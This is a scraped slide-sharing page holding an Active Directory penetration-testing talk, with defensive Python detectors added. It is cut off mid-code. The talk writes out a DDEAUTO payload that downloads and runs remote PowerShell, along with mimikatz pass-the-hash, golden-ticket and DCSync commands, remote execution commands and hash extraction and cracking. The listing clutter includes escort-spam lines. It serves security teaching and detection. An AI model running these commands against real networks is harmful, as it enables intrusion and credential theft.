Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April  Automation LPDGAPIForce Zurich 5 April  Automation LPDG
APIForce Zurich 5 April Automation LPDGMarianaLemus7
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsPrecisely
 

Dernier (20)

Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning era
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April  Automation LPDGAPIForce Zurich 5 April  Automation LPDG
APIForce Zurich 5 April Automation LPDG
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptxVulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power Systems
 

Carlos García - Pentesting Active Directory [rooted2018]

  • 13. KERBEROS SCHEME
  Protocol   Secret to use
  Kerberos   RC4-HMAC key = NT hash
             AES128 key
             AES256 key
  • 14. KERBEROS SCHEME
  1. The client encrypts a timestamp with their hash/key (pre-authentication) and sends it to the KDC
  2. The client receives a TGT encrypted with the key of the domain's krbtgt account; presenting it later proves they are who they say they are
  3. The TGT is then used to request service tickets (TGS) for specific resources/services in the domain
  4. The DC returns a service ticket encrypted with the key (hash) of the account that owns the service's SPN
  • 15. PENTESTING ACTIVE DIRECTORY Sure, but how about actually pentesting it?
  • 16. ACTIVE DIRECTORY PENETRATION TESTING: The Goal
  • 17. ACTIVE DIRECTORY PENETRATION TESTING: The Goal
  Privileged groups that are the usual target:
  • Domain Admins
  • Enterprise Admins
  • Built-in Administrators
  • Account Operators
  • Allowed RODC Password Replication Group
  • Backup Operators
  • DnsAdmins
  • …
  • 18. ACTIVE DIRECTORY PENETRATION TESTING: The real Goal!
  • 19. ACTIVE DIRECTORY PENETRATION TESTING: The real Goal! (WMIC)
  • 20. ATTACK KILL CHAIN (diagram; reference: Microsoft Advanced Threat Analytics)
  • 21. ATTACK KILL CHAIN (diagram)
  • 22. ATTACK KILL CHAIN (diagram)
  • 27. PHISHING + DDEAUTO = RCE
  • Dynamic Data Exchange (DDE): protocol for transferring data between applications
  • Valid for MS Excel, MS Word… and MS Outlook
  • Recently used for macro-less malware delivery
  Field code used in the talk (the trailing # comments out the DDE topic argument, "Beneficios Qurtuba", that Word appends to the command line):
  DDEAUTO "C:\Programs\Microsoft\Office365\Outlook\..\..\..\..\windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://172.16.201.201:8000/empire-test.ps1');powershell -e $e # " "Beneficios Qurtuba"
  Caveats: Word asks the user to update the document's links and then whether to start the application (the second prompt shows the command line), and DDE is disabled in Word by default since Microsoft's ADV170021 update (December 2017); Excel relies on the registry settings that advisory describes.
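  The defensive counterpart, as an added example that is not part of the talk: a Python check that opens a .docx and reports any DDE/DDEAUTO field code, joining the <w:instrText> runs first because the field code is routinely split across several runs. The two sample documents are constructed in memory (the "stager" in the malicious one is the harmless base64 of $e=1); the file layout it relies on is Word's real WordprocessingML structure.

```python
import html
import io
import re
import zipfile

# Word stores a complex field as <w:fldChar begin/> + one or more <w:instrText> runs
# + <w:fldChar separate/> + result + <w:fldChar end/>; simple fields keep the code in
# a w:instr attribute. Attackers split the code across runs, so runs are joined first.
INSTR_TEXT_RE = re.compile(r'<w:instrText[^>]*>(.*?)</w:instrText>', re.S)
FLD_SIMPLE_RE = re.compile(r'<w:fldSimple[^>]*?\sw:instr="([^"]*)"')
DDE_KEYWORD_RE = re.compile(r'\bDDE(?:AUTO)?\b')


def field_codes(xml: str) -> list:
    """All field instructions in one WordprocessingML part, XML entities decoded."""
    joined = html.unescape(''.join(INSTR_TEXT_RE.findall(xml)))
    return [joined] + [html.unescape(s) for s in FLD_SIMPLE_RE.findall(xml)]


def find_dde_fields(docx_bytes: bytes) -> list:
    """Return every DDE/DDEAUTO field code found in the document's XML parts."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as archive:
        for name in archive.namelist():
            if not (name.startswith('word/') and name.endswith('.xml')):
                continue
            xml = archive.read(name).decode('utf-8', 'replace')
            for code in field_codes(xml):
                starts = [m.start() for m in DDE_KEYWORD_RE.finditer(code)]
                for idx, start in enumerate(starts):
                    end = starts[idx + 1] if idx + 1 < len(starts) else len(code)
                    hits.append(' '.join(code[start:end].split()))
    return hits


def make_docx(body_xml: str) -> bytes:
    """Minimal .docx container around a constructed <w:body>, for offline testing."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w', zipfile.ZIP_DEFLATED) as archive:
        archive.writestr('[Content_Types].xml', '<?xml version="1.0"?>'
                         '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        archive.writestr('word/document.xml',
                         '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
                         '<w:body>' + body_xml + '</w:body></w:document>')
    return buf.getvalue()


# Constructed sample bodies. The base64 "stager" decodes to the harmless $e=1, so the sample is inert.
MALICIOUS_BODY = (
    '<w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>'
    '<w:r><w:instrText xml:space="preserve"> DDEAUTO &quot;C:\\Windows\\System32\\cmd.exe&quot; </w:instrText></w:r>'
    '<w:r><w:instrText xml:space="preserve">&quot;/k powershell -NoP -W Hidden -e JABlAD0AMQA=&quot; </w:instrText></w:r>'
    '<w:r><w:fldChar w:fldCharType="separate"/></w:r><w:r><w:t>Beneficios</w:t></w:r>'
    '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p>'
)
BENIGN_BODY = '<w:p><w:fldSimple w:instr=" PAGE \\* MERGEFORMAT "><w:r><w:t>1</w:t></w:r></w:fldSimple></w:p>'

if __name__ == '__main__':
    for code in find_dde_fields(make_docx(MALICIOUS_BODY)):
        print('DDE field:', code)
```

  Run it over a mail gateway's attachment queue or a share full of Office documents; for the legacy binary formats (.doc, .xls) oletools' msodde does the same job.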
  • 29. NEXT STEPS
  • Persistence (userland)
  • Reconnaissance
  • Privilege escalation
    • PowerSploit PowerUp
    • Bypass UAC
    • …
  • Persistence (admin)
  • Lateral and vertical movements
  • Grab and exfiltrate trophies
  • 31. LOCAL RECONNAISSANCE
  Collect information about the network, the processes and the OS to find out what kind of machine we have landed on.
  ipconfig /all
      IP address, subnet mask and default gateway of every adapter, plus DHCP and DNS settings
  whoami /all
      Everything in the current access token: user name, SIDs, privileges and the groups the user belongs to
  net localgroup
      Name of the host and its local groups
  net localgroup "administrators"
      Members of the local Administrators group
  netstat -an
      Active TCP/UDP connections and the ports the host is listening on, in numeric form
  tasklist /V
      Running processes and services with their PID and owning user, on the local or a remote host
  • 32. LOCAL RECONNAISSANCE
  net start
      Started Windows services
  sc qc <SERVICE>
      Configuration of a single service (binary path, start type, account)
  accesschk.exe -ucqv <SERVICE>
      Who may configure or control the service (accesschk.exe is part of the Microsoft Sysinternals suite)
  systeminfo > info_output.txt
      OS configuration, installed hotfixes, product ID and hardware properties such as RAM, disk space and network cards
  schtasks /query /fo LIST /v
      Scheduled tasks: whether they recur, where the executed file lives and its parameters and, crucially, the account they run as
  dir, type, findstr
      Browse and search the local file system
  • 33. NETWORK RECONNAISSANCE
  ping ☺
  echo %USERDOMAIN%
      Domain the host is joined to
  echo %logonserver%   (or: set logonserver)
      Domain Controller the host authenticated against
  net group /domain
      Groups in the domain
  net group "<GROUP NAME>" /domain
      Members of a group, e.g. "Domain Computers", "Domain Controllers", "Domain Admins"
  net localgroup administrators /domain
      Members of the domain's built-in Administrators group (the query is answered by a domain controller)
  • 34. NETWORK RECONNAISSANCE
  net user /domain
      All users in the current domain
  net user <ACCOUNT NAME> /domain
      Details of one user given their username (group memberships, last logon, password last set)
  net view
      Domains, computers or resources shared by the specified computer; without parameters, the computers in the current domain
  net use
      Connects to shared resources (and lists the current connections)
  net accounts /domain
      Domain password policy (length, history, lockout threshold)
  nltest /domain_trusts
      Trust relationships of the domain
  • 37. COMMON ATTACKS & TECHNIQUES
  • Passwords in SYSVOL & Group Policy Preferences (cpassword, decryptable with the AES key Microsoft published) – 10%
  • Missing patches; exploiting MS14-068 (PAC validation flaw that lets any user forge domain admin privileges) on a DC missing the patch – 5%
  • Kerberos TGS service ticket cracking (Kerberoast) – 20%
  • SMB shares mining – 75%
  • Credential theft shuffle (“Mimikatz dance”) – 60%
  Reference: https://adsecurity.org/?p=2362
  • 39. KERBEROAST
  The exchange of slide 14 with the attacker as the client: any authenticated domain user can request a service ticket (TGS) for any SPN, and the ticket the DC returns in step 4 is encrypted with the key (hash) of the account that owns that SPN.
  • 40. KERBEROAST
  • Offline brute force of the service account's password from service tickets (TGS): the encrypted part of the ticket is keyed with that account's NT hash when RC4 (etype 23) is used
  • Cracking happens offline, so it causes no traffic to the DC, no failed logons and no account lockouts; the ticket requests themselves are logged on the DC (Event ID 4769), so the collection phase can be detected
  • Invoke-Kerberoast from PowerView (dev branch) to collect the hashes
  • Focus on user accounts: computer accounts have long random passwords, services run under user accounts often do not
  • JohnTheRipper (magnumripper) or hashcat to crack them
  References:
  https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
  https://github.com/magnumripper/JohnTheRipper
  • 41. SMB SHARES MINING
  • Usually very fruitful, but sometimes boring and time-consuming
  • Enumerate the shares in the environment and look for data with hard-coded credentials (scripts, config files), backups, documentation…
  PowerView: Find-DomainShare
      Searches for computer shares in the domain. With -CheckShareAccess, only shares the current user can read are returned
  smbmap
      Intended to simplify searching for potentially sensitive data across large networks
      Enumerates SMB shares across an entire domain: lists drives, permissions and contents, uploads/downloads files, auto-downloads files whose names match a pattern, etc.
  References:
  https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
  https://github.com/ShawnDEvans/smbmap
  • 43. CREDENTIAL THEFT SHUFFLE (“Mimikatz dance”)
  • Escalate privileges on some machine
  • Extract credentials/hashes from memory (LSASS)
  • Derivative administrator: the extracted credentials are admin somewhere else
  • User hunting: move laterally and repeat the attack until Domain Admin level is reached
  Reference: https://github.com/gentilkiwi/mimikatz
  • 45. USER HUNTING
  List local admins remotely
  • Get-localadmin (script)
  • Get-NetLocalGroup (PowerView)
  List active sessions remotely
  • PsLoggedon (Sysinternals)
  • Get-NetLoggedon (PowerView)
  • Get-NetSession (PowerView)
  • tasklist /S <HOST> /V
  References:
  https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
  https://docs.microsoft.com/en-us/sysinternals/
  https://gitlab.com/ciyinet/ciyinotes/blob/master/Microsoft%20Windows/readme.md
  • 47. ciyinet 47 USER HUNTING • Invoke-UserHunter (PowerView) • BloodHound 1. Gets groups and group members of each group 2. Lists domain computers 3. Obtains local admins for each computer 4. Lists active sessions on each computer References: https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 https://github.com/BloodHoundAD/BloodHound Pentesting Active Directory
  • 49. Creds dump + Privs escalation
• 51. PASS-THE-HASH
  Protocol | Algorithm | Secret to use
  LM       | DES-ECB   | Hash LM
  NTLMv1   | DES-ECB   | Hash NT
  NTLMv2   | HMAC-MD5  | Hash NT
• 53. OVERPASS-THE-HASH (PASS-THE-KEY)
  Protocol | Secret to use
  Kerberos | RC4 = Hash NT
           | AES128 key
           | AES256 key
  References: http://blog.gentilkiwi.com/securite/mimikatz/overpass-the-hash
• 54. (OVER)PASS-THE-HASH
  mimikatz.exe "privilege::debug" "sekurlsa::pth /domain:FQDN /user:USERNAME /ntlm:NT_HASH /run:PROGRAM"
• 56. PASS-THE-TICKET
  • Inject Kerberos tickets
  • Tickets must be in Kerberos credential format (KRB_CRED): http://tools.ietf.org/html/rfc4120#section-5.8
  • The Kerberos module does not require any privilege; it uses the official Microsoft Kerberos API
  mimikatz.exe "kerberos::ptt FILENAME"
• 57. GOLDEN TICKET
  Attacker-made TGT, encrypted with the KRBTGT hash (krbtgt:hash):
  • Username
  • Group membership
  • ...
• 58. GOLDEN TICKET
  The KRBTGT hash can be used to generate arbitrary TGTs:
  • Made by the attacker, not the KDC
  • Anything can be pushed inside
  mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH /user:USERNAME /id:ID /groups:500,501,513,512,520,518,519 /ptt"
• 60. DCSYNC
  • "Impersonates" a Domain Controller and requests account password data from the targeted Domain Controller
  • Replicates the user credentials via GetNCChanges (Directory Replication Service (DRS) Remote Protocol)
  • Special rights are required to run DCSync
  mimikatz.exe "lsadump::dcsync /dc:DC /domain:DOMAIN /user:USERNAME" exit
  mimikatz.exe "lsadump::dcsync /all /csv" exit
• 62. DCSHADOW
  Registers new domain controllers to inject malicious AD objects and so create backdoors or any other kind of illegitimate access or right
  Reference: https://blog.alsid.eu/dcshadow-explained-4510f52fc19d
  "Hi guys! This is DCShadow!"
  • 63. PENTESTING ACTIVE DIRECTORY dir is boring, show me how to RCE
• 64. REMOTE CODE EXECUTION
  AT
  at \\TARGET_HOST HH:MM EXECUTABLE
  Schtasks
  schtasks /create /tn TASK_NAME /tr EXECUTABLE /sc once /st 00:00 /S TARGET_HOST /RU System
  schtasks /run /tn TASK_NAME /S TARGET_HOST
  SC
  sc \\TARGET_HOST create SERVICE_NAME binpath= "EXECUTABLE"
  sc \\TARGET_HOST start SERVICE_NAME
• 65. REMOTE CODE EXECUTION
  WMIC
  wmic /node:TARGET_HOST process call create "EXECUTABLE"
  WinRM
  Invoke-Command -ComputerName TARGET_HOST -ScriptBlock { COMMAND(S) }
  PsExec
  PsExec.exe \\TARGET_HOST -u USER PROCESS
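Each of the remote-execution channels on slides 64 and 65 leaves a characteristic host artifact (a new service, a new scheduled task, or a process whose parent is the WMI or WinRM host process), and all of them need a network logon to the target first. The following added example, which is not from the deck, ties those artifacts together: it classifies constructed Security/System events (4624 logon, 4688 process creation, 4698 scheduled task created, 7045 service installed) and reports the source address of the most recent network logon to the same host. Host names, addresses, timestamps and field names are constructed for the example; the service name PSEXESVC and the parent-process names are the real ones.

```python
"""Correlate remote-execution artifacts with the network logon that preceded them.

Added example, not part of the slide deck. Events are constructed dicts using
only the fields needed here, modelled on Security events 4624/4688/4698 and
System event 7045. Hosts, IPs and times are made up.
"""
from datetime import datetime, timedelta

NETWORK_LOGON = 3  # 4624 logon type used by SMB/RPC/WinRM sessions from another host


def technique(event):
    """Name the remote-execution channel an event is characteristic of, or None."""
    eid = event["id"]
    if eid == 7045:
        # PsExec installs its helper service as PSEXESVC; any other new service
        # matches the 'sc \\host create' pattern.
        return "PsExec" if event.get("service", "").upper() == "PSEXESVC" else "SC (service creation)"
    if eid == 4698:
        return "Schtasks/AT (scheduled task)"
    if eid == 4688:
        parent = event.get("parent", "").lower()
        if parent.endswith("wmiprvse.exe"):
            return "WMIC (process spawned by WMI provider host)"
        if parent.endswith("wsmprovhost.exe"):
            return "WinRM (process spawned by WinRM host)"
    return None


def remote_exec_hits(events, window=timedelta(minutes=5)):
    """For each execution artifact, report the source of the latest network
    logon to the same host within `window`, or None if there was none."""
    hits = []
    events = sorted(events, key=lambda e: e["time"])
    for i, e in enumerate(events):
        name = technique(e)
        if name is None:
            continue
        source = None
        for prior in reversed(events[:i]):
            if e["time"] - prior["time"] > window:
                break  # older events cannot be the triggering logon
            if (prior["id"] == 4624 and prior["host"] == e["host"]
                    and prior.get("logon_type") == NETWORK_LOGON):
                source = prior.get("src_ip")
                break
        hits.append({"host": e["host"], "technique": name, "source": source})
    return hits


T = datetime(2018, 3, 1, 10, 0, 0)  # constructed base time
EVENTS = [  # constructed sample events
    {"id": 4624, "host": "SRV01", "time": T, "logon_type": 3, "src_ip": "10.0.0.55"},
    {"id": 7045, "host": "SRV01", "time": T + timedelta(seconds=2),
     "service": "PSEXESVC", "image": "%SystemRoot%\\PSEXESVC.exe"},
    {"id": 4624, "host": "SRV02", "time": T + timedelta(minutes=1), "logon_type": 3, "src_ip": "10.0.0.55"},
    {"id": 4688, "host": "SRV02", "time": T + timedelta(minutes=1, seconds=3),
     "parent": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", "process": "C:\\Windows\\System32\\cmd.exe"},
    {"id": 4688, "host": "SRV03", "time": T + timedelta(minutes=2),
     "parent": "C:\\Windows\\explorer.exe", "process": "C:\\Windows\\System32\\notepad.exe"},
    {"id": 4698, "host": "SRV03", "time": T + timedelta(minutes=30), "task": "\\Updater"},
]

if __name__ == "__main__":
    for hit in remote_exec_hits(EVENTS):
        print(f"{hit['host']}: {hit['technique']} (network logon from {hit['source']})")
```

The scheduled task on SRV03 is reported with no source because no network logon reached that host in the preceding five minutes, which is exactly the case a reviewer should look at separately: either the task was created locally, or the logon evidence is missing.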
• 68. NTDS.DIT
  How to get hashes from it:
  1. Decrypt the Password Encryption Key (PEK). The PEK is encrypted using the bootkey
  2. First round of hash decryption with the PEK using RC4
  3. Second round of hash decryption with DES
• 69. GRAB NTDS.DIT AND SYSTEM
  Volume Shadow Copy
  vssadmin create shadow /for=C:
  Ntdsutil
  ntdsutil "ac i ntds" "ifm" "create full c:\copy-ntds" quit quit
  Invoke-NinjaCopy
  Invoke-NinjaCopy -Path "C:\Windows\NTDS\ntds.dit" -LocalDestination "C:\ntds.dit"
  Invoke-NinjaCopy -Path "C:\Windows\System32\config\SYSTEM" -LocalDestination "C:\SYSTEM"
• 72. CRACKING NT HASHES
  John the Ripper
  john FILE_HASHES --format=NT
  Hashcat & Rockyou wordlist
  hashcat -a 0 -m 1000 --username FILE_HASHES /usr/share/wordlists/rockyou.txt --potfile-path OUTPUT_NT.pot
  • 75. PENTESTING ACTIVE DIRECTORY But how about the blue team? Microsoft ATA
• 77. PASS-THE-HASH
  • Based on local Security events
  • Not captured by ATA by default
  • Force NTLM to be used
  • Overpass-the-hash: the encryption downgrade is detected
  mimikatz.exe "privilege::debug" "sekurlsa::pth /domain:FQDN /user:USERNAME /ntlm:NT_HASH /aes128:AES128_key /aes256:AES256_key /run:PROGRAM" exit
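Both the Kerberoast slide (40) and the overpass-the-hash slide (77) come down to the same observable: a Kerberos ticket issued with RC4-HMAC (encryption type 0x17) where AES would be expected. A TGS-REQ yields a ticket encrypted with the service account's key, so RC4 service tickets for user-account SPNs are what gets cracked offline, and an RC4 TGT for an account that has AES keys is the "encryption downgrade" the slide says ATA flags. The following added example, not from the deck, shows both checks over constructed 4768/4769 records. The set of AES-capable accounts is a constructed assumption standing in for what msDS-SupportedEncryptionTypes would tell you.

```python
"""Kerberos encryption-type review over constructed 4768/4769 events.

Added example (not from the slide deck). Records are plain dicts modelled on
the Ticket Encryption Type field of Windows Security events 4768 (TGT
requested) and 4769 (service ticket requested); the values are constructed.
"""
from collections import defaultdict

RC4_HMAC = 0x17  # etype 23: cracked offline by Kerberoast, used by a downgraded AS-REQ

# Constructed sample events (not real telemetry).
EVENTS = [
    {"id": 4769, "account": "alice@corp.local",  "service": "WS01$",      "etype": 0x12,     "ip": "10.0.0.15"},
    {"id": 4769, "account": "alice@corp.local",  "service": "svc_sql",    "etype": RC4_HMAC, "ip": "10.0.0.15"},
    {"id": 4769, "account": "alice@corp.local",  "service": "svc_backup", "etype": RC4_HMAC, "ip": "10.0.0.15"},
    {"id": 4769, "account": "alice@corp.local",  "service": "svc_web",    "etype": RC4_HMAC, "ip": "10.0.0.15"},
    {"id": 4769, "account": "dave@corp.local",   "service": "svc_sql",    "etype": RC4_HMAC, "ip": "10.0.0.40"},
    {"id": 4768, "account": "bob@corp.local",    "service": "krbtgt",     "etype": RC4_HMAC, "ip": "10.0.0.77"},
    {"id": 4768, "account": "carol@corp.local",  "service": "krbtgt",     "etype": 0x12,     "ip": "10.0.0.20"},
    {"id": 4768, "account": "legacy@corp.local", "service": "krbtgt",     "etype": RC4_HMAC, "ip": "10.0.0.90"},
]

# Constructed assumption: accounts whose msDS-SupportedEncryptionTypes advertises
# AES, so an RC4 TGT for them is a downgrade rather than the normal case.
AES_CAPABLE = {"alice@corp.local", "bob@corp.local", "carol@corp.local"}


def is_user_spn(service):
    """Kerberoast targets SPNs held by user accounts; computer accounts end in '$'."""
    return not service.endswith("$") and service.lower() != "krbtgt"


def kerberoast_candidates(events, min_services=3):
    """Accounts that pulled RC4 service tickets for several distinct user-account SPNs.

    One RC4 ticket for a legacy service is ordinary; one requester collecting
    RC4 tickets for many user SPNs looks like ticket harvesting.
    """
    per_account = defaultdict(set)
    for e in events:
        if e["id"] == 4769 and e["etype"] == RC4_HMAC and is_user_spn(e["service"]):
            per_account[e["account"]].add(e["service"])
    return sorted((acct, sorted(svcs)) for acct, svcs in per_account.items()
                  if len(svcs) >= min_services)


def encryption_downgrades(events, aes_capable=AES_CAPABLE):
    """AES-capable accounts that obtained an RC4 TGT (the overpass-the-hash signature)."""
    return sorted({e["account"] for e in events
                   if e["id"] == 4768 and e["etype"] == RC4_HMAC and e["account"] in aes_capable})


if __name__ == "__main__":
    for acct, svcs in kerberoast_candidates(EVENTS):
        print(f"possible Kerberoast by {acct}: {', '.join(svcs)}")
    for acct in encryption_downgrades(EVENTS):
        print(f"RC4 TGT issued to AES-capable account {acct}")
```

The legacy account in the sample gets an RC4 TGT without being flagged, which is the point of keeping an inventory of which accounts genuinely still need RC4: without it the downgrade check drowns in noise, and with it the slide's trick of supplying AES keys alongside the NT hash is the only way the request blends in.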
• 80. GOLDEN TICKET
  • Same as overpass-the-hash
  • Detection based on lifetime
  • Default ticket lifetime in AD is 10 hours
  mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH /aes128:AES128_key /aes256:AES256_key /startoffset:0 /endin:600 /renewmax:10080 /user:USERNAME /ptt"
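The lifetime-based detection the slide describes is easy to state precisely: compare a ticket's end time and renew-until time against the domain's Kerberos policy (10 hours and 7 days by default, which is what /endin:600 and /renewmax:10080 reproduce, both in minutes). The following added example, not part of the deck, implements that comparison over constructed ticket records and shows why a forged ticket trimmed to policy values is indistinguishable from a legitimate one on lifetime alone. The ten-year sample stands for a forged ticket whose lifetime was left at mimikatz's default; the times are made up.

```python
"""Ticket-lifetime policy check over constructed Kerberos ticket records.

Added example (not from the slide deck). A ticket is a dict holding the start,
end and renew-until times one would read from klist; all samples are constructed.
"""
from datetime import datetime, timedelta

# Default domain Kerberos policy: 10 h maximum ticket life, 7 days renewal.
MAX_TICKET = timedelta(hours=10)
MAX_RENEWAL = timedelta(days=7)


def ticket_from_minutes(start, endin, renewmax):
    """Build a ticket record from minute counts, the units the forging
    parameters on the slide (/endin, /renewmax) are expressed in."""
    return {"start": start,
            "end": start + timedelta(minutes=endin),
            "renew_until": start + timedelta(minutes=renewmax)}


def lifetime_findings(ticket, max_ticket=MAX_TICKET, max_renewal=MAX_RENEWAL):
    """Return the policy violations a lifetime-based detector would raise."""
    findings = []
    life = ticket["end"] - ticket["start"]
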